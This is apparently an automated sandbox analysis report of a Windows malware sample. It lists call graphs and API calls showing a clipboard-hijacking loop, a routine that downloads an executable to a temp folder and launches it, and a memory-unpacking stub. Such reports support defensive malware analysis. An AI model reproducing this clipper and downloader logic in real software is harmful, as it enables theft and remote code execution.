433064 64142 42eab6 20 API calls __dosmaperr 64104->64142 64147 432c45 31 API calls 3 library calls 64106->64147 64110 43327e 64107->64110 64107->64111 64148 432a85 29 API calls __fread_nolock 64110->64148 64111->64100 64113 433283 64113->64111 64114->64021 64115->64035 64116->64032 64117->64031 64118->64041 64119->64042 64120->64035 64121->64025 64122->64031 64123->64035 64125 43d372 64124->64125 64127 43d37f 64124->64127 64154 42eac9 20 API calls __dosmaperr 64125->64154 64129 43d38b 64127->64129 64155 42eac9 20 API calls __dosmaperr 64127->64155 64128 43d377 64128->64078 64129->64078 64131 43d3ac 64156 42a59d 26 API calls _Deallocate 64131->64156 64133->64054 64134->64058 64135->64064 64136->64063 64137->64073 64138->64079 64139->64111 64140->64075 64141->64104 64142->64111 64144 434755 __fread_nolock 28 API calls 64143->64144 64145 434804 64144->64145 64145->64074 64146->64111 64147->64111 64148->64113 64149->64102 64150->64111 64151->64057 64152->64063 64153->64058 64154->64128 64155->64131 64156->64128 64157 402bad RegCreateKeyExW 64158 402bdb RegSetValueExW 64157->64158 64159 402bef 64157->64159 64158->64159 64160 402bf4 RegCloseKey 64159->64160 64161 402bfd 64159->64161 64160->64161 64162 404b8e 64163 404b9a Concurrency::details::SchedulerProxy::AddExecutionResource 64162->64163 64168 40fb0c 64163->64168 64167 404bba Hash Concurrency::details::SchedulerProxy::AddExecutionResource 64170 40fb11 64168->64170 64171 404ba3 64170->64171 64173 40fb2d Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 64170->64173 64192 42ad7e 64170->64192 64199 42f450 7 API calls 2 library calls 64170->64199 64176 4051d0 64171->64176 64200 42860d RaiseException 64173->64200 64175 4103cc 64177 4051dc Concurrency::details::SchedulerProxy::AddExecutionResource __Cnd_init 64176->64177 64179 4051f4 __Mtx_init 64177->64179 64211 40ce32 28 API calls std::_Throw_Cpp_error 64177->64211 64182 40521b 64179->64182 64212 40ce32 28 API calls std::_Throw_Cpp_error 64179->64212 64203 4010ea 64182->64203 64186 40526a 64187 40527f Hash 64186->64187 64214 401128 28 API calls 2 library calls 64186->64214 64215 401109 64187->64215 64191 4052a4 Concurrency::details::SchedulerProxy::AddExecutionResource 64191->64167 64197 4336a7 std::_Locinfo::_Locinfo_ctor 64192->64197 64193 4336e5 64202 42eac9 20 API calls __dosmaperr 64193->64202 64194 4336d0 RtlAllocateHeap 64196 4336e3 64194->64196 64194->64197 64196->64170 64197->64193 64197->64194 64201 42f450 7 API calls 2 library calls 64197->64201 64199->64170 64200->64175 64201->64197 64202->64196 64219 40d313 64203->64219 64206 401103 64208 40cef3 64206->64208 64243 42e114 64208->64243 64211->64179 64212->64182 64213 40ce32 28 API calls std::_Throw_Cpp_error 64213->64186 64214->64186 64216 401115 __Mtx_unlock 64215->64216 64217 401122 64216->64217 64569 40ce32 28 API calls std::_Throw_Cpp_error 64216->64569 64217->64191 64223 40d06d 64219->64223 64222 40ce32 28 API calls std::_Throw_Cpp_error 64222->64206 64224 40d0c3 64223->64224 64225 40d095 GetCurrentThreadId 64223->64225 64226 40d0c7 GetCurrentThreadId 64224->64226 64231 40d0ed 64224->64231 64227 40d0a0 GetCurrentThreadId 64225->64227 64237 40d0bb 64225->64237 64233 40d0d6 64226->64233 64227->64237 64228 40d186 GetCurrentThreadId 64228->64233 64229 40d1dd GetCurrentThreadId 64229->64237 64230 40f8cf __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 64234 4010f6 64230->64234 64231->64228 64232 40d10d 64231->64232 64241 40e92f GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 64232->64241 64233->64229 64233->64237 64234->64206 64234->64222 64237->64230 64238 40d145 GetCurrentThreadId 64238->64233 64239 40d118 __Xtime_diff_to_millis2 64238->64239 64239->64233 64239->64237 64239->64238 64242 40e92f GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 64239->64242 64241->64239 64242->64239 64244 42e121 64243->64244 64245 42e135 64243->64245 64266 42eac9 20 API calls __dosmaperr 64244->64266 64257 42e0cb 64245->64257 64248 42e126 64267 42a59d 26 API calls _Deallocate 64248->64267 64251 42e14a CreateThread 64252 42e169 GetLastError 64251->64252 64253 42e175 64251->64253 64286 42dfc0 64251->64286 64268 42ea93 20 API calls 3 library calls 64252->64268 64269 42e03d 64253->64269 64254 405257 64254->64186 64254->64213 64277 434d2a 64257->64277 64260 43346a _free 20 API calls 64261 42e0e4 64260->64261 64262 42e103 64261->64262 64263 42e0eb GetModuleHandleExW 64261->64263 64264 42e03d __Thrd_start 22 API calls 64262->64264 64263->64262 64265 42e10d 64264->64265 64265->64251 64265->64253 64266->64248 64267->64254 64268->64253 64270 42e04a 64269->64270 64271 42e06e 64269->64271 64272 42e050 CloseHandle 64270->64272 64273 42e059 64270->64273 64271->64254 64272->64273 64274 42e068 64273->64274 64275 42e05f FreeLibrary 64273->64275 64276 43346a _free 20 API calls 64274->64276 64275->64274 64276->64271 64278 434d37 std::_Locinfo::_Locinfo_ctor 64277->64278 64279 434d77 64278->64279 64280 434d62 RtlAllocateHeap 64278->64280 64284 42f450 7 API calls 2 library calls 64278->64284 64285 42eac9 20 API calls __dosmaperr 64279->64285 64280->64278 64281 42e0db 64280->64281 64281->64260 64284->64278 64285->64281 64287 42dfcc _Atexit 64286->64287 64288 42dfd3 GetLastError ExitThread 64287->64288 64289 42dfe0 64287->64289 64302 431eda GetLastError 64289->64302 64291 42dfe5 64322 435571 64291->64322 64294 42dffb 64329 401169 64294->64329 64303 431ef0 64302->64303 64306 431ef6 64302->64306 64337 435111 11 API calls 2 library calls 64303->64337 64305 434d2a __Getcoll 20 API calls 64307 431f08 64305->64307 64306->64305 64308 431f45 SetLastError 64306->64308 64309 431f10 64307->64309 64338 435167 11 API calls 2 library calls 64307->64338 64308->64291 64311 43346a _free 20 API calls 64309->64311 64313 431f16 64311->64313 64312 431f25 64312->64309 64314 431f2c 64312->64314 64315 431f51 SetLastError 64313->64315 64339 431d4c 20 API calls __Getcoll 64314->64339 64340 42df7d 167 API calls 2 library calls 64315->64340 64317 431f37 64319 43346a _free 20 API calls 64317->64319 64321 431f3e 64319->64321 64320 431f5d 64321->64308 64321->64315 64323 435596 64322->64323 64324 43558c 64322->64324 64341 434e93 5 API calls 2 library calls 64323->64341 64326 40f8cf __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 64324->64326 64327 42dff0 64326->64327 64327->64294 64336 4354a4 10 API calls 2 library calls 64327->64336 64328 4355ad 64328->64324 64342 405800 64329->64342 64355 40155a Sleep 64329->64355 64330 401173 64333 42e199 64330->64333 64537 42e074 64333->64537 64335 42e1a6 64336->64294 64337->64306 64338->64312 64339->64317 64340->64320 64341->64328 64343 40580c Concurrency::details::SchedulerProxy::AddExecutionResource 64342->64343 64344 4010ea std::_Cnd_initX 35 API calls 64343->64344 64345 405821 __Cnd_signal 64344->64345 64346 405839 64345->64346 64401 40ce32 28 API calls std::_Throw_Cpp_error 64345->64401 64348 401109 std::_Cnd_initX 28 API calls 64346->64348 64349 405842 64348->64349 64357 4016df 64349->64357 64378 4029f4 InternetOpenW 64349->64378 64352 405849 Hash Concurrency::details::SchedulerProxy::AddExecutionResource 64352->64330 64356 4016d5 64355->64356 64402 40fde6 64357->64402 64359 4016eb Sleep 64403 40cc10 64359->64403 64362 40cc10 28 API calls 64363 401711 64362->64363 64364 40171b OpenClipboard 64363->64364 64365 401943 Sleep 64364->64365 64366 40172b GetClipboardData 64364->64366 64365->64364 64367 40173b GlobalLock 64366->64367 64368 40193d CloseClipboard 64366->64368 64367->64368 64372 401748 _strlen 64367->64372 64368->64365 64369 40cbc7 28 API calls std::system_error::system_error 64369->64372 64370 40cc10 28 API calls 64370->64372 64372->64368 64372->64369 64372->64370 64373 4018d2 EmptyClipboard GlobalAlloc 64372->64373 64407 402e66 167 API calls 2 library calls 64372->64407 64409 40caa6 26 API calls _Deallocate 64372->64409 64373->64372 64375 4018eb GlobalLock 64373->64375 64408 426990 64375->64408 64377 401905 GlobalUnlock SetClipboardData GlobalFree 64377->64372 64379 402a27 InternetOpenUrlW 64378->64379 64380 402b9c 64378->64380 64379->64380 64381 402a3d GetTempPathW GetTempFileNameW 64379->64381 64383 40f8cf __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 64380->64383 64415 42a88e 64381->64415 64385 402bab 64383->64385 64394 40e76b 64385->64394 64386 402b8b InternetCloseHandle InternetCloseHandle 64386->64380 64387 402aa8 ___scrt_fastfail 64388 402ac0 InternetReadFile WriteFile 64387->64388 64389 402b00 CloseHandle 64387->64389 64388->64387 64417 402960 64389->64417 64392 402b2b ShellExecuteExW 64392->64386 64393 402b72 WaitForSingleObject CloseHandle 64392->64393 64393->64386 64528 40deea 64394->64528 64398 40e782 __Cnd_do_broadcast_at_thread_exit __Mtx_unlock __Cnd_broadcast 64535 40def6 LeaveCriticalSection std::_Lockit::~_Lockit 64398->64535 64400 40e810 64400->64352 64401->64346 64402->64359 64404 40cc2c _strlen 64403->64404 64410 40cbc7 64404->64410 64406 401704 64406->64362 64407->64372 64408->64377 64409->64372 64411 40cbfa 64410->64411 64412 40cbd6 BuildCatchObjectHelperInternal 64410->64412 64411->64412 64414 40cb5c 28 API calls 4 library calls 64411->64414 64412->64406 64414->64412 64416 402a76 CreateFileW 64415->64416 64416->64386 64416->64387 64418 40298b _wcslen ___scrt_fastfail 64417->64418 64427 42b454 64418->64427 64422 4029b8 64449 404333 64422->64449 64425 40f8cf __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 64426 4029f2 64425->64426 64426->64386 64426->64392 64453 42b106 64427->64453 64430 402823 64431 402832 Concurrency::details::SchedulerProxy::AddExecutionResource 64430->64431 64479 4032dd 64431->64479 64433 402846 64495 403b8b 64433->64495 64435 40285a 64436 402888 64435->64436 64437 40286c 64435->64437 64501 403112 64436->64501 64522 40329a 167 API calls 64437->64522 64440 402895 64504 403c20 64440->64504 64442 4028a7 64514 403cc2 64442->64514 64444 40287f std::ios_base::_Ios_base_dtor Concurrency::details::SchedulerProxy::AddExecutionResource 64444->64422 64445 4028c4 64446 404333 26 API calls 64445->64446 64447 4028e3 64446->64447 64523 40329a 167 API calls 64447->64523 64450 40433b 64449->64450 64452 4029e4 64449->64452 64524 40cc96 64450->64524 64452->64425 64454 42b133 64453->64454 64455 42b142 64454->64455 64456 42b15a 64454->64456 64467 42b137 64454->64467 64458 42eac9 __Wcscoll 20 API calls 64455->64458 64457 42a747 __fassign 162 API calls 64456->64457 64459 42b165 64457->64459 64461 42b147 64458->64461 64462 42b170 64459->64462 64463 42b307 64459->64463 64460 40f8cf __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 64464 4029a4 64460->64464 64465 42a59d __Thrd_start 26 API calls 64461->64465 64469 42b218 WideCharToMultiByte 64462->64469 64471 42b17b 64462->64471 64476 42b1b5 WideCharToMultiByte 64462->64476 64466 42b334 WideCharToMultiByte 64463->64466 64468 42b312 64463->64468 64464->64430 64465->64467 64466->64468 64467->64460 64468->64467 64470 42eac9 __Wcscoll 20 API calls 64468->64470 64469->64471 64472 42b243 64469->64472 64470->64467 64471->64467 64475 42eac9 __Wcscoll 20 API calls 64471->64475 64472->64471 64474 42b24c GetLastError 64472->64474 64474->64471 64478 42b25b 64474->64478 64475->64467 64476->64471 64477 42b274 WideCharToMultiByte 64477->64468 64477->64478 64478->64467 64478->64468 64478->64477 64480 4032e9 Concurrency::details::SchedulerProxy::AddExecutionResource 64479->64480 64481 40467c 167 API calls 64480->64481 64482 403315 64481->64482 64483 40484d 167 API calls 64482->64483 64484 40333e 64483->64484 64485 40458c 26 API calls 64484->64485 64486 40334d 64485->64486 64487 40dde3 167 API calls 64486->64487 64494 403392 std::ios_base::_Ios_base_dtor 64486->64494 64489 403362 64487->64489 64488 4033ce Concurrency::details::SchedulerProxy::AddExecutionResource 64488->64433 64491 40458c 26 API calls 64489->64491 64489->64494 64490 40c618 167 API calls 64490->64488 64492 403373 64491->64492 64493 404c14 167 API calls 64492->64493 64493->64494 64494->64488 64494->64490 64496 403b97 Concurrency::details::SchedulerProxy::AddExecutionResource 64495->64496 64497 4042af 167 API calls 64496->64497 64498 403ba3 64497->64498 64499 403bc7 Concurrency::details::SchedulerProxy::AddExecutionResource 64498->64499 64500 4034fb 167 API calls 64498->64500 64499->64435 64500->64499 64502 404356 28 API calls 64501->64502 64503 40312c ___scrt_fastfail 64502->64503 64503->64440 64505 403c2c Concurrency::details::SchedulerProxy::AddExecutionResource 64504->64505 64506 40c618 167 API calls 64505->64506 64507 403c4f 64506->64507 64508 4042af 167 API calls 64507->64508 64509 403c59 64508->64509 64510 403c9c Concurrency::details::SchedulerProxy::AddExecutionResource 64509->64510 64513 4034fb 167 API calls 64509->64513 64510->64442 64511 403c7a 64511->64510 64512 4046ca 167 API calls 64511->64512 64512->64510 64513->64511 64515 403cce __EH_prolog3_catch 64514->64515 64516 4042af 167 API calls 64515->64516 64518 403ce7 64516->64518 64517 4046ca 167 API calls 64520 403d70 Concurrency::details::SchedulerProxy::AddExecutionResource 64517->64520 64519 403d17 64518->64519 64521 40369f 40 API calls 64518->64521 64519->64517 64520->64445 64521->64519 64522->64444 64523->64444 64525 40cca3 64524->64525 64526 40ccb0 Hash 64524->64526 64527 40cc72 _Deallocate 26 API calls 64525->64527 64526->64452 64527->64526 64536 40f22a EnterCriticalSection 64528->64536 64530 40def4 64531 40ce99 GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 64530->64531 64532 40ced2 64531->64532 64533 40cec7 CloseHandle 64531->64533 64534 40ced6 GetCurrentThreadId 64532->64534 64533->64534 64534->64398 64535->64400 64536->64530 64546 431f5e GetLastError 64537->64546 64539 42e083 ExitThread 64540 42e0a1 64543 42e0b4 64540->64543 64544 42e0ad CloseHandle 64540->64544 64543->64539 64545 42e0c0 FreeLibraryAndExitThread 64543->64545 64544->64543 64547 431f7d 64546->64547 64548 431f77 64546->64548 64550 434d2a __Getcoll 17 API calls 64547->64550 64552 431fd4 SetLastError 64547->64552 64566 435111 11 API calls 2 library calls 64548->64566 64551 431f8f 64550->64551 64554 431f97 64551->64554 64567 435167 11 API calls 2 library calls 64551->64567 64553 42e07f 64552->64553 64553->64539 64553->64540 64565 4354f6 10 API calls 2 library calls 64553->64565 64557 43346a _free 17 API calls 64554->64557 64556 431fac 64556->64554 64558 431fb3 64556->64558 64559 431f9d 64557->64559 64568 431d4c 20 API calls __Getcoll 64558->64568 64561 431fcb SetLastError 64559->64561 64561->64553 64562 431fbe 64563 43346a _free 17 API calls 64562->64563 64564 431fc4 64563->64564 64564->64552 64564->64561 64565->64540 64566->64547 64567->64556 64568->64562 64569->64217 64570 40239e 64571 402561 PostQuitMessage 64570->64571 64572 4023b2 64570->64572 64576 40255f 64571->64576 64573 4023b9 DefWindowProcW 64572->64573 64574 4023d0 64572->64574 64573->64576 64575 4029f4 167 API calls 64574->64575 64574->64576 64575->64576

                                                              Control-flow Graph

                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 004016E6
                                                              • Sleep.KERNEL32(00001541,0000004C), ref: 004016F0
                                                                • Part of subcall function 0040CC10: _strlen.LIBCMT ref: 0040CC27
                                                              • OpenClipboard.USER32(00000000), ref: 0040171D
                                                              • GetClipboardData.USER32(00000001), ref: 0040172D
                                                              • GlobalLock.KERNEL32(00000000), ref: 0040173C
                                                              • _strlen.LIBCMT ref: 00401749
                                                              • _strlen.LIBCMT ref: 00401778
                                                              • _strlen.LIBCMT ref: 004018BC
                                                              • EmptyClipboard.USER32 ref: 004018D2
                                                              • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018DF
                                                              • GlobalLock.KERNEL32(00000000), ref: 004018FD
                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00401909
                                                              • SetClipboardData.USER32(00000001,00000000), ref: 00401912
                                                              • GlobalFree.KERNEL32(00000000), ref: 00401919
                                                              • CloseClipboard.USER32 ref: 0040193D
                                                              • Sleep.KERNEL32(000002D2), ref: 00401948
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                              • String ID: i
                                                              • API String ID: 1583243082-3865851505
                                                              • Opcode ID: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
                                                              • Instruction ID: e3fffec023ebc7079252f179b6fac15abd8ab57f1bda789313b6278f228a63c7
                                                              • Opcode Fuzzy Hash: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
                                                              • Instruction Fuzzy Hash: 26510531C00384DAE7119B64EC567AD7774FF29306F04523AE805721B3EB789A85C75D

                                                              Control-flow Graph

                                                              APIs
                                                              • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A17
                                                              • InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 00402A2D
                                                              • GetTempPathW.KERNEL32(00000105,?), ref: 00402A49
                                                              • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A5F
                                                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A98
                                                              • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AD4
                                                              • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AF1
                                                              • CloseHandle.KERNEL32(00000000), ref: 00402B07
                                                              • ShellExecuteExW.SHELL32(?), ref: 00402B68
                                                              • WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B7D
                                                              • CloseHandle.KERNEL32(?), ref: 00402B89
                                                              • InternetCloseHandle.WININET(00000000), ref: 00402B92
                                                              • InternetCloseHandle.WININET(00000000), ref: 00402B95
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                              • String ID: .exe$<$ShareScreen
                                                              • API String ID: 3323492106-493228180
                                                              • Opcode ID: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
                                                              • Instruction ID: e60cee4ce2238679e1fb1751da2f8ba8583e6b9327599976f3985bfb1b161874
                                                              • Opcode Fuzzy Hash: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
                                                              • Instruction Fuzzy Hash: 4741437190021CAFEB209F649D85FEAB7BCFF05745F0081F6A549E2190DEB49E858FA4
                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008DE5EE
                                                              • Module32First.KERNEL32(00000000,00000224), ref: 008DE60E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093473645.00000000008DD000.00000040.00000020.00020000.00000000.sdmp, Offset: 008DD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_8dd000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFirstModule32SnapshotToolhelp32
                                                              • String ID:
                                                              • API String ID: 3833638111-0
                                                              • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                              • Instruction ID: c8413a37ce65fcee6a0b9a8cc0b2f7136a6545739d305614b4a686b9165c543b
                                                              • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                              • Instruction Fuzzy Hash: 35F062312007146BD7203AF9A88DB6E77E8FF69765F10062AF642D55C0DA70E8458A61

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 74 43d03c-43d06c call 43cd9f 77 43d087-43d093 call 43977e 74->77 78 43d06e-43d079 call 42eab6 74->78 84 43d095-43d0aa call 42eab6 call 42eac9 77->84 85 43d0ac-43d0f5 call 43cd0a 77->85 83 43d07b-43d082 call 42eac9 78->83 94 43d35e-43d364 83->94 84->83 92 43d162-43d16b GetFileType 85->92 93 43d0f7-43d100 85->93 98 43d1b4-43d1b7 92->98 99 43d16d-43d19e GetLastError call 42ea93 CloseHandle 92->99 96 43d102-43d106 93->96 97 43d137-43d15d GetLastError call 42ea93 93->97 96->97 103 43d108-43d135 call 43cd0a 96->103 97->83 101 43d1c0-43d1c6 98->101 102 43d1b9-43d1be 98->102 99->83 113 43d1a4-43d1af call 42eac9 99->113 106 43d1ca-43d218 call 4396c7 101->106 107 43d1c8 101->107 102->106 103->92 103->97 116 43d21a-43d226 call 43cf1b 106->116 117 43d228-43d24c call 43cabd 106->117 107->106 113->83 116->117 123 43d250-43d25a call 4335cd 116->123 124 43d25f-43d2a2 117->124 125 43d24e 117->125 123->94 126 43d2c3-43d2d1 124->126 127 43d2a4-43d2a8 124->127 125->123 130 43d2d7-43d2db 126->130 131 43d35c 126->131 127->126 129 43d2aa-43d2be 127->129 129->126 130->131 133 43d2dd-43d310 CloseHandle call 43cd0a 130->133 131->94 136 43d312-43d33e GetLastError call 42ea93 call 439890 133->136 137 43d344-43d358 133->137 136->137 137->131
                                                              APIs
                                                                • Part of subcall function 0043CD0A: CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27
                                                              • GetLastError.KERNEL32 ref: 0043D150
                                                              • __dosmaperr.LIBCMT ref: 0043D157
                                                              • GetFileType.KERNEL32(00000000), ref: 0043D163
                                                              • GetLastError.KERNEL32 ref: 0043D16D
                                                              • __dosmaperr.LIBCMT ref: 0043D176
                                                              • CloseHandle.KERNEL32(00000000), ref: 0043D196
                                                              • CloseHandle.KERNEL32(?), ref: 0043D2E0
                                                              • GetLastError.KERNEL32 ref: 0043D312
                                                              • __dosmaperr.LIBCMT ref: 0043D319
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                              • String ID: H
                                                              • API String ID: 4237864984-2852464175
                                                              • Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                              • Instruction ID: 375b4e16163f674ce9da34a4ad13212d62ba31a6b33a52f993f1a67b08af40b6
                                                              • Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                              • Instruction Fuzzy Hash: ACA13632E101149FCF19AF68EC517AE7BA1AF0A324F14115EF8159B391D6389D02CB5A

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 142 432f29-432f39 143 432f53-432f55 142->143 144 432f3b-432f4e call 42eab6 call 42eac9 142->144 146 432f5b-432f61 143->146 147 4332bd-4332ca call 42eab6 call 42eac9 143->147 161 4332d5 144->161 146->147 150 432f67-432f92 146->150 166 4332d0 call 42a59d 147->166 150->147 153 432f98-432fa1 150->153 156 432fa3-432fb6 call 42eab6 call 42eac9 153->156 157 432fbb-432fbd 153->157 156->166 159 432fc3-432fc7 157->159 160 4332b9-4332bb 157->160 159->160 165 432fcd-432fd1 159->165 163 4332d8-4332dd 160->163 161->163 165->156 168 432fd3-432fea 165->168 166->161 171 433007-433010 168->171 172 432fec-432fef 168->172 175 433012-433029 call 42eab6 call 42eac9 call 42a59d 171->175 176 43302e-433038 171->176 173 432ff1-432ff7 172->173 174 432ff9-433002 172->174 173->174 173->175 179 4330a3-4330bd 174->179 206 4331f0 175->206 177 43303a-43303c 176->177 178 43303f-43305d call 4336a7 call 43346a * 2 176->178 177->178 215 43307a-4330a0 call 4347ee 178->215 216 43305f-433075 call 42eac9 call 42eab6 178->216 181 4330c3-4330d3 179->181 182 433191-43319a call 43d365 179->182 181->182 185 4330d9-4330db 181->185 193 43320d 182->193 194 43319c-4331ae 182->194 185->182 191 4330e1-433107 185->191 191->182 196 43310d-433120 191->196 202 433211-433229 ReadFile 193->202 194->193 198 4331b0-4331bf GetConsoleMode 194->198 196->182 200 433122-433124 196->200 198->193 205 4331c1-4331c5 198->205 200->182 207 433126-433151 200->207 203 433285-433290 GetLastError 202->203 204 43322b-433231 202->204 209 433292-4332a4 call 42eac9 call 42eab6 203->209 210 4332a9-4332ac 203->210 204->203 211 433233 204->211 205->202 212 4331c7-4331e1 ReadConsoleW 205->212 213 4331f3-4331fd call 43346a 206->213 207->182 214 433153-433166 207->214 209->206 222 4332b2-4332b4 210->222 223 4331e9-4331ef call 42ea93 210->223 218 433236-433248 211->218 220 4331e3 GetLastError 212->220 221 433202-43320b 212->221 213->163 214->182 225 433168-43316a 214->225 215->179 216->206 218->213 228 43324a-43324e 218->228 220->223 221->218 222->213 223->206 225->182 232 43316c-43318c 225->232 235 433250-433260 call 432c45 228->235 236 433267-433272 228->236 232->182 247 433263-433265 235->247 242 433274 call 432d95 236->242 243 43327e-433283 call 432a85 236->243 248 433279-43327c 242->248 243->248 247->213 248->247
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                              • Instruction ID: e6f917e7e92ba8bfc6e6230e9bcbcb6957f35208d34794f9861c257e27c575d5
                                                              • Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                              • Instruction Fuzzy Hash: 44C11670E04345AFDF11DFAAD841BAEBBB0BF0D305F14119AE815A7392C7389A41CB69

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 250 247003c-2470047 251 247004c-2470263 call 2470a3f call 2470e0f call 2470d90 VirtualAlloc 250->251 252 2470049 250->252 267 2470265-2470289 call 2470a69 251->267 268 247028b-2470292 251->268 252->251 272 24702ce-24703c2 VirtualProtect call 2470cce call 2470ce7 267->272 270 24702a1-24702b0 268->270 271 24702b2-24702cc 270->271 270->272 271->270 279 24703d1-24703e0 272->279 280 24703e2-2470437 call 2470ce7 279->280 281 2470439-24704b8 VirtualFree 279->281 280->279 283 24705f4-24705fe 281->283 284 24704be-24704cd 281->284 287 2470604-247060d 283->287 288 247077f-2470789 283->288 286 24704d3-24704dd 284->286 286->283 293 24704e3-2470505 LoadLibraryA 286->293 287->288 289 2470613-2470637 287->289 291 24707a6-24707b0 288->291 292 247078b-24707a3 288->292 294 247063e-2470648 289->294 295 24707b6-24707cb 291->295 296 247086e-24708be LoadLibraryA 291->296 292->291 297 2470517-2470520 293->297 298 2470507-2470515 293->298 294->288 301 247064e-247065a 294->301 299 24707d2-24707d5 295->299 306 24708c7-24708f9 296->306 300 2470526-2470547 297->300 298->300 302 24707d7-24707e0 299->302 303 2470824-2470833 299->303 304 247054d-2470550 300->304 301->288 305 2470660-247066a 301->305 307 24707e4-2470822 302->307 308 24707e2 302->308 312 2470839-247083c 303->312 309 2470556-247056b 304->309 310 24705e0-24705ef 304->310 311 247067a-2470689 305->311 313 2470902-247091d 306->313 314 24708fb-2470901 306->314 307->299 308->303 315 247056f-247057a 309->315 316 247056d 309->316 310->286 317 2470750-247077a 311->317 318 247068f-24706b2 311->318 312->296 319 247083e-2470847 312->319 314->313 321 247057c-2470599 315->321 322 247059b-24705bb 315->322 316->310 317->294 323 24706b4-24706ed 318->323 324 24706ef-24706fc 318->324 325 247084b-247086c 319->325 326 2470849 319->326 333 24705bd-24705db 321->333 322->333 323->324 327 24706fe-2470748 324->327 328 247074b 324->328 325->312 326->296 327->328 328->311 333->304
                                                              APIs
                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0247024D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID: cess$kernel32.dll
                                                              • API String ID: 4275171209-1230238691
                                                              • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                              • Instruction ID: 70afa96c0848c9c0fdeb42663e0eb32a74bf9eb8c3c80e1c0e0c7b8db5e94173
                                                              • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
